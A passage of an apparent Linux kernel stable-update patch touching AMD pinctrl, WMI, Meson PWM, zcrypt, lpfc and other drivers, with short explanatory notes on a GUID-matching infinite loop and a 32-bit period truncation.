+@@ -181,9 +181,6 @@ void riscv_pmu_start(struct perf_event *event, int flags)
+ 	uint64_t max_period = riscv_pmu_ctr_get_width_mask(event);
+ 	u64 init_val;
+ 
+-	if (WARN_ON_ONCE(!(event->hw.state & PERF_HES_STOPPED)))
+-		return;
+-
+ 	if (flags & PERF_EF_RELOAD)
+ 		WARN_ON_ONCE(!(event->hw.state & PERF_HES_UPTODATE));
+ 
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index 32c3edaf90385..a8df77e80549c 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -115,16 +115,20 @@ static void amd_gpio_set_value(struct gpio_chip *gc, unsigned offset, int value)
+ 	raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+ }
+ 
+-static int amd_gpio_set_debounce(struct gpio_chip *gc, unsigned offset,
+-		unsigned debounce)
++static int amd_gpio_set_debounce(struct amd_gpio *gpio_dev, unsigned int offset,
++				 unsigned int debounce)
+ {
+ 	u32 time;
+ 	u32 pin_reg;
+ 	int ret = 0;
+-	unsigned long flags;
+-	struct amd_gpio *gpio_dev = gpiochip_get_data(gc);
+ 
+-	raw_spin_lock_irqsave(&gpio_dev->lock, flags);
++	/* Use special handling for Pin0 debounce */
++	if (offset == 0) {
++		pin_reg = readl(gpio_dev->base + WAKE_INT_MASTER_REG);
++		if (pin_reg & INTERNAL_GPIO0_DEBOUNCE)
++			debounce = 0;
++	}
++
+ 	pin_reg = readl(gpio_dev->base + offset * 4);
+ 
+ 	if (debounce) {
+@@ -175,23 +179,10 @@ static int amd_gpio_set_debounce(struct gpio_chip *gc, unsigned offset,
+ 		pin_reg &= ~(DB_CNTRl_MASK << DB_CNTRL_OFF);
+ 	}
+ 	writel(pin_reg, gpio_dev->base + offset * 4);
+-	raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+ 
+ 	return ret;
+ }
+ 
+-static int amd_gpio_set_config(struct gpio_chip *gc, unsigned offset,
+-			       unsigned long config)
+-{
+-	u32 debounce;
+-
+-	if (pinconf_to_config_param(config) != PIN_CONFIG_INPUT_DEBOUNCE)
+-		return -ENOTSUPP;
+-
+-	debounce = pinconf_to_config_argument(config);
+-	return amd_gpio_set_debounce(gc, offset, debounce);
+-}
+-
+ #ifdef CONFIG_DEBUG_FS
+ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ {
+@@ -206,19 +197,19 @@ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ 
+ 	char *level_trig;
+ 	char *active_level;
+-	char *interrupt_enable;
+ 	char *interrupt_mask;
+ 	char *wake_cntrl0;
+ 	char *wake_cntrl1;
+ 	char *wake_cntrl2;
+ 	char *pin_sts;
+-	char *pull_up_sel;
+-	char *pull_up_enable;
+-	char *pull_down_enable;
++	char *interrupt_sts;
++	char *wake_sts;
+ 	char *orientation;
+ 	char debounce_value[40];
+ 	char *debounce_enable;
++	char *wake_cntrlz;
+ 
++	seq_printf(s, "WAKE_INT_MASTER_REG: 0x%08x\n", readl(gpio_dev->base + WAKE_INT_MASTER_REG));
+ 	for (bank = 0; bank < gpio_dev->hwbank_num; bank++) {
+ 		unsigned int time = 0;
+ 		unsigned int unit = 0;
+@@ -245,6 +236,7 @@ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ 			continue;
+ 		}
+ 		seq_printf(s, "GPIO bank%d\n", bank);
++		seq_puts(s, "gpio\t  int|active|trigger|S0i3| S3|S4/S5| Z|wake|pull|  orient|       debounce|reg\n");
+ 		for (; i < pin_num; i++) {
+ 			seq_printf(s, "#%d\t", i);
+ 			raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+@@ -254,7 +246,6 @@ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ 			if (pin_reg & BIT(INTERRUPT_ENABLE_OFF)) {
+ 				u8 level = (pin_reg >> ACTIVE_LEVEL_OFF) &
+ 						ACTIVE_LEVEL_MASK;
+-				interrupt_enable = "+";
+ 
+ 				if (level == ACTIVE_LEVEL_HIGH)
+ 					active_level = "↑";
+@@ -271,59 +262,61 @@ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ 				else
+ 					level_trig = " edge";
+ 
+-			} else {
+-				interrupt_enable = "∅";
+-				active_level = "∅";
+-				level_trig = "    ∅";
+-			}
++				if (pin_reg & BIT(INTERRUPT_MASK_OFF))
++					interrupt_mask = "😛";
++				else
++					interrupt_mask = "😷";
+ 
+-			if (pin_reg & BIT(INTERRUPT_MASK_OFF))
+-				interrupt_mask = "😛";
+-			else
+-				interrupt_mask = "😷";
+-			seq_printf(s, "int %s (%s)| active-%s| %s-⚡| ",
+-				   interrupt_enable,
++				if (pin_reg & BIT(INTERRUPT_STS_OFF))
++					interrupt_sts = "🔥";
++				else
++					interrupt_sts = "  ";
++
++				seq_printf(s, "%s %s|     %s|  %s|",
++				   interrupt_sts,
+ 				   interrupt_mask,
+ 				   active_level,
+ 				   level_trig);
++			} else
++				seq_puts(s, "    ∅|      |       |");
+ 
+ 			if (pin_reg & BIT(WAKE_CNTRL_OFF_S0I3))
+ 				wake_cntrl0 = "⏰";
+ 			else
+-				wake_cntrl0 = " ∅";
+-			seq_printf(s, "S0i3 %s| ", wake_cntrl0);
++				wake_cntrl0 = "  ";
++			seq_printf(s, "  %s| ", wake_cntrl0);
+ 
+ 			if (pin_reg & BIT(WAKE_CNTRL_OFF_S3))
+ 				wake_cntrl1 = "⏰";
+ 			else
+-				wake_cntrl1 = " ∅";
+-			seq_printf(s, "S3 %s| ", wake_cntrl1);
++				wake_cntrl1 = "  ";
++			seq_printf(s, "%s|", wake_cntrl1);
+ 
+ 			if (pin_reg & BIT(WAKE_CNTRL_OFF_S4))
+ 				wake_cntrl2 = "⏰";
+ 			else
+-				wake_cntrl2 = " ∅";
+-			seq_printf(s, "S4/S5 %s| ", wake_cntrl2);
++				wake_cntrl2 = "  ";
++			seq_printf(s, "   %s|", wake_cntrl2);
+ 
+-			if (pin_reg & BIT(PULL_UP_ENABLE_OFF)) {
+-				pull_up_enable = "+";
+-				if (pin_reg & BIT(PULL_UP_SEL_OFF))
+-					pull_up_sel = "8k";
+-				else
+-					pull_up_sel = "4k";
+-			} else {
+-				pull_up_enable = "∅";
+-				pull_up_sel = "  ";
+-			}
+-			seq_printf(s, "pull-↑ %s (%s)| ",
+-				   pull_up_enable,
+-				   pull_up_sel);
++			if (pin_reg & BIT(WAKECNTRL_Z_OFF))
++				wake_cntrlz = "⏰";
++			else
++				wake_cntrlz = "  ";
++			seq_printf(s, "%s|", wake_cntrlz);
+ 
+-			if (pin_reg & BIT(PULL_DOWN_ENABLE_OFF))
+-				pull_down_enable = "+";
++			if (pin_reg & BIT(WAKE_STS_OFF))
++				wake_sts = "🔥";
+ 			else
+-				pull_down_enable = "∅";
+-			seq_printf(s, "pull-↓ %s| ", pull_down_enable);
++				wake_sts = " ";
++			seq_printf(s, "   %s|", wake_sts);
++
++			if (pin_reg & BIT(PULL_UP_ENABLE_OFF)) {
++				seq_puts(s, "  ↑ |");
++			} else if (pin_reg & BIT(PULL_DOWN_ENABLE_OFF)) {
++				seq_puts(s, "  ↓ |");
++			} else  {
++				seq_puts(s, "    |");
++			}
+ 
+ 			if (pin_reg & BIT(OUTPUT_ENABLE_OFF)) {
+ 				pin_sts = "output";
+@@ -338,7 +331,7 @@ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ 				else
+ 					orientation = "↓";
+ 			}
+-			seq_printf(s, "%s %s| ", pin_sts, orientation);
++			seq_printf(s, "%s %s|", pin_sts, orientation);
+ 
+ 			db_cntrl = (DB_CNTRl_MASK << DB_CNTRL_OFF) & pin_reg;
+ 			if (db_cntrl) {
+@@ -357,19 +350,17 @@ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ 						unit = 61;
+ 				}
+ 				if ((DB_TYPE_REMOVE_GLITCH << DB_CNTRL_OFF) == db_cntrl)
+-					debounce_enable = "b +";
++					debounce_enable = "b";
+ 				else if ((DB_TYPE_PRESERVE_LOW_GLITCH << DB_CNTRL_OFF) == db_cntrl)
+-					debounce_enable = "↓ +";
++					debounce_enable = "↓";
+ 				else
+-					debounce_enable = "↑ +";
+-
++					debounce_enable = "↑";
++				snprintf(debounce_value, sizeof(debounce_value), "%06u", time * unit);
++				seq_printf(s, "%s (🕑 %sus)|", debounce_enable, debounce_value);
+ 			} else {
+-				debounce_enable = "  ∅";
+-				time = 0;
++				seq_puts(s, "               |");
+ 			}
+-			snprintf(debounce_value, sizeof(debounce_value), "%u", time * unit);
+-			seq_printf(s, "debounce %s (🕑 %sus)| ", debounce_enable, debounce_value);
+-			seq_printf(s, " 0x%x\n", pin_reg);
++			seq_printf(s, "0x%x\n", pin_reg);
+ 		}
+ 	}
+ }
+@@ -648,21 +639,21 @@ static bool do_amd_gpio_irq_handler(int irq, void *dev_id)
+ 			 * We must read the pin register again, in case the
+ 			 * value was changed while executing
+ 			 * generic_handle_domain_irq() above.
+-			 * If we didn't find a mapping for the interrupt,
+-			 * disable it in order to avoid a system hang caused
+-			 * by an interrupt storm.
++			 * If the line is not an irq, disable it in order to
++			 * avoid a system hang caused by an interrupt storm.
+ 			 */
+ 			raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+ 			regval = readl(regs + i);
+-			if (irq == 0) {
+-				regval &= ~BIT(INTERRUPT_ENABLE_OFF);
++			if (!gpiochip_line_is_irq(gc, irqnr + i)) {
++				regval &= ~BIT(INTERRUPT_MASK_OFF);
+ 				dev_dbg(&gpio_dev->pdev->dev,
+ 					"Disabling spurious GPIO IRQ %d\n",
+ 					irqnr + i);
++			} else {
++				ret = true;
+ 			}
+ 			writel(regval, regs + i);
+ 			raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+-			ret = true;
+ 		}
+ 	}
+ 	/* did not cause wake on resume context for shared IRQ */
+@@ -749,7 +740,7 @@ static int amd_pinconf_get(struct pinctrl_dev *pctldev,
+ 		break;
+ 
+ 	case PIN_CONFIG_BIAS_PULL_UP:
+-		arg = (pin_reg >> PULL_UP_SEL_OFF) & (BIT(0) | BIT(1));
++		arg = (pin_reg >> PULL_UP_ENABLE_OFF) & BIT(0);
+ 		break;
+ 
+ 	case PIN_CONFIG_DRIVE_STRENGTH:
+@@ -768,7 +759,7 @@ static int amd_pinconf_get(struct pinctrl_dev *pctldev,
+ }
+ 
+ static int amd_pinconf_set(struct pinctrl_dev *pctldev, unsigned int pin,
+-				unsigned long *configs, unsigned num_configs)
++			   unsigned long *configs, unsigned int num_configs)
+ {
+ 	int i;
+ 	u32 arg;
+@@ -786,9 +777,8 @@ static int amd_pinconf_set(struct pinctrl_dev *pctldev, unsigned int pin,
+ 
+ 		switch (param) {
+ 		case PIN_CONFIG_INPUT_DEBOUNCE:
+-			pin_reg &= ~DB_TMR_OUT_MASK;
+-			pin_reg |= arg & DB_TMR_OUT_MASK;
+-			break;
++			ret = amd_gpio_set_debounce(gpio_dev, pin, arg);
++			goto out_unlock;
+ 
+ 		case PIN_CONFIG_BIAS_PULL_DOWN:
+ 			pin_reg &= ~BIT(PULL_DOWN_ENABLE_OFF);
+@@ -796,10 +786,8 @@ static int amd_pinconf_set(struct pinctrl_dev *pctldev, unsigned int pin,
+ 			break;
+ 
+ 		case PIN_CONFIG_BIAS_PULL_UP:
+-			pin_reg &= ~BIT(PULL_UP_SEL_OFF);
+-			pin_reg |= (arg & BIT(0)) << PULL_UP_SEL_OFF;
+ 			pin_reg &= ~BIT(PULL_UP_ENABLE_OFF);
+-			pin_reg |= ((arg>>1) & BIT(0)) << PULL_UP_ENABLE_OFF;
++			pin_reg |= (arg & BIT(0)) << PULL_UP_ENABLE_OFF;
+ 			break;
+ 
+ 		case PIN_CONFIG_DRIVE_STRENGTH:
+@@ -817,6 +805,7 @@ static int amd_pinconf_set(struct pinctrl_dev *pctldev, unsigned int pin,
+ 
+ 		writel(pin_reg, gpio_dev->base + pin*4);
+ 	}
++out_unlock:
+ 	raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+ 
+ 	return ret;
+@@ -858,6 +847,14 @@ static int amd_pinconf_group_set(struct pinctrl_dev *pctldev,
+ 	return 0;
+ }
+ 
++static int amd_gpio_set_config(struct gpio_chip *gc, unsigned int pin,
++			       unsigned long config)
++{
++	struct amd_gpio *gpio_dev = gpiochip_get_data(gc);
++
++	return amd_pinconf_set(gpio_dev->pctrl, pin, &config, 1);
++}
++
+ static const struct pinconf_ops amd_pinconf_ops = {
+ 	.pin_config_get		= amd_pinconf_get,
+ 	.pin_config_set		= amd_pinconf_set,
+@@ -865,34 +862,6 @@ static const struct pinconf_ops amd_pinconf_ops = {
+ 	.pin_config_group_set = amd_pinconf_group_set,
+ };
+ 
+-static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
+-{
+-	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
+-	unsigned long flags;
+-	u32 pin_reg, mask;
+-	int i;
+-
+-	mask = BIT(WAKE_CNTRL_OFF_S0I3) | BIT(WAKE_CNTRL_OFF_S3) |
+-		BIT(INTERRUPT_MASK_OFF) | BIT(INTERRUPT_ENABLE_OFF) |
+-		BIT(WAKE_CNTRL_OFF_S4);
+-
+-	for (i = 0; i < desc->npins; i++) {
+-		int pin = desc->pins[i].number;
+-		const struct pin_desc *pd = pin_desc_get(gpio_dev->pctrl, pin);
+-
+-		if (!pd)
+-			continue;
+-
+-		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+-
+-		pin_reg = readl(gpio_dev->base + i * 4);
+-		pin_reg &= ~mask;
+-		writel(pin_reg, gpio_dev->base + i * 4);
+-
+-		raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+-	}
+-}
+-
+ #ifdef CONFIG_PM_SLEEP
+ static bool amd_gpio_should_save(struct amd_gpio *gpio_dev, unsigned int pin)
+ {
+@@ -1130,9 +1099,6 @@ static int amd_gpio_probe(struct platform_device *pdev)
+ 		return PTR_ERR(gpio_dev->pctrl);
+ 	}
+ 
+-	/* Disable and mask interrupts */
+-	amd_gpio_irq_init(gpio_dev);
+-
+ 	girq = &gpio_dev->gc.irq;
+ 	gpio_irq_chip_set_chip(girq, &amd_gpio_irqchip);
+ 	/* This will let us handle the parent IRQ in the driver */
+diff --git a/drivers/pinctrl/pinctrl-amd.h b/drivers/pinctrl/pinctrl-amd.h
+index c8635998465db..34c5c3e71fb26 100644
+--- a/drivers/pinctrl/pinctrl-amd.h
++++ b/drivers/pinctrl/pinctrl-amd.h
+@@ -17,6 +17,7 @@
+ #define AMD_GPIO_PINS_BANK3     32
+ 
+ #define WAKE_INT_MASTER_REG 0xfc
++#define INTERNAL_GPIO0_DEBOUNCE (1 << 15)
+ #define EOI_MASK (1 << 29)
+ 
+ #define WAKE_INT_STATUS_REG0 0x2f8
+@@ -35,13 +36,13 @@
+ #define WAKE_CNTRL_OFF_S4               15
+ #define PIN_STS_OFF			16
+ #define DRV_STRENGTH_SEL_OFF		17
+-#define PULL_UP_SEL_OFF			19
+ #define PULL_UP_ENABLE_OFF		20
+ #define PULL_DOWN_ENABLE_OFF		21
+ #define OUTPUT_VALUE_OFF		22
+ #define OUTPUT_ENABLE_OFF		23
+ #define SW_CNTRL_IN_OFF			24
+ #define SW_CNTRL_EN_OFF			25
++#define WAKECNTRL_Z_OFF			27
+ #define INTERRUPT_STS_OFF		28
+ #define WAKE_STS_OFF			29
+ 
+diff --git a/drivers/platform/x86/wmi.c b/drivers/platform/x86/wmi.c
+index 223550a10d4dd..2fe6e147785e4 100644
+--- a/drivers/platform/x86/wmi.c
++++ b/drivers/platform/x86/wmi.c
+@@ -135,6 +135,16 @@ static acpi_status find_guid(const char *guid_string, struct wmi_block **out)
+ 	return AE_NOT_FOUND;
+ }
+ 
++static bool guid_parse_and_compare(const char *string, const guid_t *guid)
++{
++	guid_t guid_input;
++
++	if (guid_parse(string, &guid_input))
++		return false;
++
++	return guid_equal(&guid_input, guid);
++}
++
+ static const void *find_guid_context(struct wmi_block *wblock,
+ 				     struct wmi_driver *wdriver)
+ {
+@@ -145,11 +155,7 @@ static const void *find_guid_context(struct wmi_block *wblock,
+ 		return NULL;
+ 
+ 	while (*id->guid_string) {
+-		guid_t guid_input;
+-
+-		if (guid_parse(id->guid_string, &guid_input))
+-			continue;
+-		if (guid_equal(&wblock->gblock.guid, &guid_input))
++		if (guid_parse_and_compare(id->guid_string, &wblock->gblock.guid))
+ 			return id->context;
+ 		id++;
+ 	}
+@@ -833,11 +839,7 @@ static int wmi_dev_match(struct device *dev, struct device_driver *driver)
+ 		return 0;
+ 
+ 	while (*id->guid_string) {
+-		guid_t driver_guid;
+-
+-		if (WARN_ON(guid_parse(id->guid_string, &driver_guid)))
+-			continue;
+-		if (guid_equal(&driver_guid, &wblock->gblock.guid))
++		if (guid_parse_and_compare(id->guid_string, &wblock->gblock.guid))
+ 			return 1;
+ 
+ 		id++;
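
Besides removing duplication, guid_parse_and_compare() fixes a latent hang: in the loops it replaces, a guid_parse() failure hit "continue" before the terminating "id++", so a single malformed GUID string in a driver's ID table would spin forever. The old shape, reproduced from the removed lines:

	while (*id->guid_string) {
		guid_t guid_input;

		if (guid_parse(id->guid_string, &guid_input))
			continue;	/* id never advances: infinite loop */
		if (guid_equal(&guid_input, &wblock->gblock.guid))
			return id->context;
		id++;
	}
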
+diff --git a/drivers/pwm/pwm-meson.c b/drivers/pwm/pwm-meson.c
+index 5732300eb0046..33107204a951d 100644
+--- a/drivers/pwm/pwm-meson.c
++++ b/drivers/pwm/pwm-meson.c
+@@ -156,8 +156,9 @@ static int meson_pwm_calc(struct meson_pwm *meson, struct pwm_device *pwm,
+ 			  const struct pwm_state *state)
+ {
+ 	struct meson_pwm_channel *channel = &meson->channels[pwm->hwpwm];
+-	unsigned int duty, period, pre_div, cnt, duty_cnt;
++	unsigned int pre_div, cnt, duty_cnt;
+ 	unsigned long fin_freq;
++	u64 duty, period;
+ 
+ 	duty = state->duty_cycle;
+ 	period = state->period;
+@@ -179,19 +180,19 @@ static int meson_pwm_calc(struct meson_pwm *meson, struct pwm_device *pwm,
+ 
+ 	dev_dbg(meson->chip.dev, "fin_freq: %lu Hz\n", fin_freq);
+ 
+-	pre_div = div64_u64(fin_freq * (u64)period, NSEC_PER_SEC * 0xffffLL);
++	pre_div = div64_u64(fin_freq * period, NSEC_PER_SEC * 0xffffLL);
+ 	if (pre_div > MISC_CLK_DIV_MASK) {
+ 		dev_err(meson->chip.dev, "unable to get period pre_div\n");
+ 		return -EINVAL;
+ 	}
+ 
+-	cnt = div64_u64(fin_freq * (u64)period, NSEC_PER_SEC * (pre_div + 1));
++	cnt = div64_u64(fin_freq * period, NSEC_PER_SEC * (pre_div + 1));
+ 	if (cnt > 0xffff) {
+ 		dev_err(meson->chip.dev, "unable to get period cnt\n");
+ 		return -EINVAL;
+ 	}
+ 
+-	dev_dbg(meson->chip.dev, "period=%u pre_div=%u cnt=%u\n", period,
++	dev_dbg(meson->chip.dev, "period=%llu pre_div=%u cnt=%u\n", period,
+ 		pre_div, cnt);
+ 
+ 	if (duty == period) {
+@@ -204,14 +205,13 @@ static int meson_pwm_calc(struct meson_pwm *meson, struct pwm_device *pwm,
+ 		channel->lo = cnt;
+ 	} else {
+ 		/* Then check is we can have the duty with the same pre_div */
+-		duty_cnt = div64_u64(fin_freq * (u64)duty,
+-				     NSEC_PER_SEC * (pre_div + 1));
++		duty_cnt = div64_u64(fin_freq * duty, NSEC_PER_SEC * (pre_div + 1));
+ 		if (duty_cnt > 0xffff) {
+ 			dev_err(meson->chip.dev, "unable to get duty cycle\n");
+ 			return -EINVAL;
+ 		}
+ 
+-		dev_dbg(meson->chip.dev, "duty=%u pre_div=%u duty_cnt=%u\n",
++		dev_dbg(meson->chip.dev, "duty=%llu pre_div=%u duty_cnt=%u\n",
+ 			duty, pre_div, duty_cnt);
+ 
+ 		channel->pre_div = pre_div;
+@@ -351,18 +351,8 @@ static int meson_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	channel->lo = FIELD_GET(PWM_LOW_MASK, value);
+ 	channel->hi = FIELD_GET(PWM_HIGH_MASK, value);
+ 
+-	if (channel->lo == 0) {
+-		state->period = meson_pwm_cnt_to_ns(chip, pwm, channel->hi);
+-		state->duty_cycle = state->period;
+-	} else if (channel->lo >= channel->hi) {
+-		state->period = meson_pwm_cnt_to_ns(chip, pwm,
+-						    channel->lo + channel->hi);
+-		state->duty_cycle = meson_pwm_cnt_to_ns(chip, pwm,
+-							channel->hi);
+-	} else {
+-		state->period = 0;
+-		state->duty_cycle = 0;
+-	}
++	state->period = meson_pwm_cnt_to_ns(chip, pwm, channel->lo + channel->hi);
++	state->duty_cycle = meson_pwm_cnt_to_ns(chip, pwm, channel->hi);
+ 
+ 	state->polarity = PWM_POLARITY_NORMAL;
+ 
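
Widening duty and period to u64 matters because struct pwm_state already carries both as u64: a request above UINT_MAX nanoseconds (about 4.29 s) silently truncated in the old 32-bit locals before any division happened. A standalone illustration of the truncation, using a hypothetical 5 s period:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint64_t period_ns = 5000000000ULL;		/* 5 s, valid in pwm_state */
	unsigned int old_local = (unsigned int)period_ns;	/* old local type */

	printf("requested: %llu ns\n", (unsigned long long)period_ns);
	printf("truncated: %u ns\n", old_local);	/* prints 705032704 */
	return 0;
}
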
+diff --git a/drivers/s390/crypto/zcrypt_msgtype6.c b/drivers/s390/crypto/zcrypt_msgtype6.c
+index 5ad2514775931..f99a9ef42116f 100644
+--- a/drivers/s390/crypto/zcrypt_msgtype6.c
++++ b/drivers/s390/crypto/zcrypt_msgtype6.c
+@@ -1188,6 +1188,9 @@ static long zcrypt_msgtype6_send_cprb(bool userspace, struct zcrypt_queue *zq,
+ 		ap_cancel_message(zq->queue, ap_msg);
+ 	}
+ 
++	if (rc == -EAGAIN && ap_msg->flags & AP_MSG_FLAG_ADMIN)
++		rc = -EIO; /* do not retry administrative requests */
++
+ out:
+ 	if (rc)
+ 		ZCRYPT_DBF_DBG("%s send cprb at dev=%02x.%04x rc=%d\n",
+@@ -1308,6 +1311,9 @@ static long zcrypt_msgtype6_send_ep11_cprb(bool userspace, struct zcrypt_queue *
+ 		ap_cancel_message(zq->queue, ap_msg);
+ 	}
+ 
++	if (rc == -EAGAIN && ap_msg->flags & AP_MSG_FLAG_ADMIN)
++		rc = -EIO; /* do not retry administrative requests */
++
+ out:
+ 	if (rc)
+ 		ZCRYPT_DBF_DBG("%s send cprb at dev=%02x.%04x rc=%d\n",
+diff --git a/drivers/scsi/lpfc/lpfc_crtn.h b/drivers/scsi/lpfc/lpfc_crtn.h
+index d2d207791056c..3a5650e0e2076 100644
+--- a/drivers/scsi/lpfc/lpfc_crtn.h
++++ b/drivers/scsi/lpfc/lpfc_crtn.h
+@@ -134,7 +134,6 @@ void lpfc_check_nlp_post_devloss(struct lpfc_vport *vport,
+ 				 struct lpfc_nodelist *ndlp);
+ void lpfc_ignore_els_cmpl(struct lpfc_hba *phba, struct lpfc_iocbq *cmdiocb,
+ 			  struct lpfc_iocbq *rspiocb);
+-int  lpfc_nlp_not_used(struct lpfc_nodelist *ndlp);
+ struct lpfc_nodelist *lpfc_setup_disc_node(struct lpfc_vport *, uint32_t);
+ void lpfc_disc_list_loopmap(struct lpfc_vport *);
+ void lpfc_disc_start(struct lpfc_vport *);
+diff --git a/drivers/scsi/lpfc/lpfc_els.c b/drivers/scsi/lpfc/lpfc_els.c
+index e21c73a3803ec..43ebb41ded593 100644
+--- a/drivers/scsi/lpfc/lpfc_els.c
++++ b/drivers/scsi/lpfc/lpfc_els.c
+@@ -5150,14 +5150,9 @@ lpfc_els_free_iocb(struct lpfc_hba *phba, struct lpfc_iocbq *elsiocb)
+  *
+  * This routine is the completion callback function to the Logout (LOGO)
+  * Accept (ACC) Response ELS command. This routine is invoked to indicate
+- * the completion of the LOGO process. It invokes the lpfc_nlp_not_used() to
+- * release the ndlp if it has the last reference remaining (reference count
+- * is 1). If succeeded (meaning ndlp released), it sets the iocb ndlp
+- * field to NULL to inform the following lpfc_els_free_iocb() routine no
+- * ndlp reference count needs to be decremented. Otherwise, the ndlp
+- * reference use-count shall be decremented by the lpfc_els_free_iocb()
+- * routine. Finally, the lpfc_els_free_iocb() is invoked to release the
+- * IOCB data structure.
++ * the completion of the LOGO process. If the node has transitioned to NPR,
++ * this routine unregisters the RPI if it is still registered. Finally,
++ * lpfc_els_free_iocb() is invoked to release the IOCB data structure.
+  **/
+ static void
+ lpfc_cmpl_els_logo_acc(struct lpfc_hba *phba, struct lpfc_iocbq *cmdiocb,
+@@ -5198,19 +5193,9 @@ lpfc_cmpl_els_logo_acc(struct lpfc_hba *phba, struct lpfc_iocbq *cmdiocb,
+ 		    (ndlp->nlp_last_elscmd == ELS_CMD_PLOGI))
+ 			goto out;
+ 
+-		/* NPort Recovery mode or node is just allocated */
+-		if (!lpfc_nlp_not_used(ndlp)) {
+-			/* A LOGO is completing and the node is in NPR state.
+-			 * Just unregister the RPI because the node is still
+-			 * required.
+-			 */
++		if (ndlp->nlp_flag & NLP_RPI_REGISTERED)
+ 			lpfc_unreg_rpi(vport, ndlp);
+-		} else {
+-			/* Indicate the node has already released, should
+-			 * not reference to it from within lpfc_els_free_iocb.
+-			 */
+-			cmdiocb->ndlp = NULL;
+-		}
++
+ 	}
+  out:
+ 	/*
+@@ -5230,9 +5215,8 @@ lpfc_cmpl_els_logo_acc(struct lpfc_hba *phba, struct lpfc_iocbq *cmdiocb,
+  * RPI (Remote Port Index) mailbox command to the @phba. It simply releases
+  * the associated lpfc Direct Memory Access (DMA) buffer back to the pool and
+  * decrements the ndlp reference count held for this completion callback
+- * function. After that, it invokes the lpfc_nlp_not_used() to check
+- * whether there is only one reference left on the ndlp. If so, it will
+- * perform one more decrement and trigger the release of the ndlp.
++ * function. After that, it invokes lpfc_drop_node() to check
++ * whether it is appropriate to release the node.
+  **/
+ void
+ lpfc_mbx_cmpl_dflt_rpi(struct lpfc_hba *phba, LPFC_MBOXQ_t *pmb)
+diff --git a/drivers/scsi/lpfc/lpfc_hbadisc.c b/drivers/scsi/lpfc/lpfc_hbadisc.c
+index d38ebd7281b9b..549fa7d6c0f6f 100644
+--- a/drivers/scsi/lpfc/lpfc_hbadisc.c
++++ b/drivers/scsi/lpfc/lpfc_hbadisc.c
+@@ -4332,13 +4332,14 @@ out:
+ 
+ 		/* If the node is not registered with the scsi or nvme
+ 		 * transport, remove the fabric node.  The failed reg_login
+-		 * is terminal.
++		 * is terminal and forces the removal of the last node
++		 * reference.
+ 		 */
+ 		if (!(ndlp->fc4_xpt_flags & (SCSI_XPT_REGD | NVME_XPT_REGD))) {
+ 			spin_lock_irq(&ndlp->lock);
+ 			ndlp->nlp_flag &= ~NLP_NPR_2B_DISC;
+ 			spin_unlock_irq(&ndlp->lock);
+-			lpfc_nlp_not_used(ndlp);
++			lpfc_nlp_put(ndlp);
+ 		}
+ 
+ 		if (phba->fc_topology == LPFC_TOPOLOGY_LOOP) {
+@@ -6703,25 +6704,6 @@ lpfc_nlp_put(struct lpfc_nodelist *ndlp)
+ 	return ndlp ? kref_put(&ndlp->kref, lpfc_nlp_release) : 0;
+ }
+ 
+-/* This routine free's the specified nodelist if it is not in use
+- * by any other discovery thread. This routine returns 1 if the
+- * ndlp has been freed. A return value of 0 indicates the ndlp is
+- * not yet been released.
+- */
+-int
+-lpfc_nlp_not_used(struct lpfc_nodelist *ndlp)
+-{
+-	lpfc_debugfs_disc_trc(ndlp->vport, LPFC_DISC_TRC_NODE,
+-		"node not used:   did:x%x flg:x%x refcnt:x%x",
+-		ndlp->nlp_DID, ndlp->nlp_flag,
+-		kref_read(&ndlp->kref));
+-
+-	if (kref_read(&ndlp->kref) == 1)
+-		if (lpfc_nlp_put(ndlp))
+-			return 1;
+-	return 0;
+-}
+-
+ /**
+  * lpfc_fcf_inuse - Check if FCF can be unregistered.
+  * @phba: Pointer to hba context object.
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index 64355d0baa5fb..d2c7de804b998 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -402,6 +402,11 @@ static void mpi3mr_process_admin_reply_desc(struct mpi3mr_ioc *mrioc,
+ 				memcpy((u8 *)cmdptr->reply, (u8 *)def_reply,
+ 				    mrioc->reply_sz);
+ 			}
++			if (sense_buf && cmdptr->sensebuf) {
++				cmdptr->is_sense = 1;
++				memcpy(cmdptr->sensebuf, sense_buf,
++				       MPI3MR_SENSE_BUF_SZ);
++			}
+ 			if (cmdptr->is_waiting) {
+ 				complete(&cmdptr->done);
+ 				cmdptr->is_waiting = 0;
+diff --git a/drivers/scsi/qla2xxx/qla_attr.c b/drivers/scsi/qla2xxx/qla_attr.c
+index b67ad30d56e6f..64734d6e8ccb1 100644
+--- a/drivers/scsi/qla2xxx/qla_attr.c
++++ b/drivers/scsi/qla2xxx/qla_attr.c
+@@ -2750,6 +2750,7 @@ static void
+ qla2x00_terminate_rport_io(struct fc_rport *rport)
+ {
+ 	fc_port_t *fcport = *(fc_port_t **)rport->dd_data;
++	scsi_qla_host_t *vha;
+ 
+ 	if (!fcport)
+ 		return;
+@@ -2759,9 +2760,12 @@ qla2x00_terminate_rport_io(struct fc_rport *rport)
+ 
+ 	if (test_bit(ABORT_ISP_ACTIVE, &fcport->vha->dpc_flags))
+ 		return;
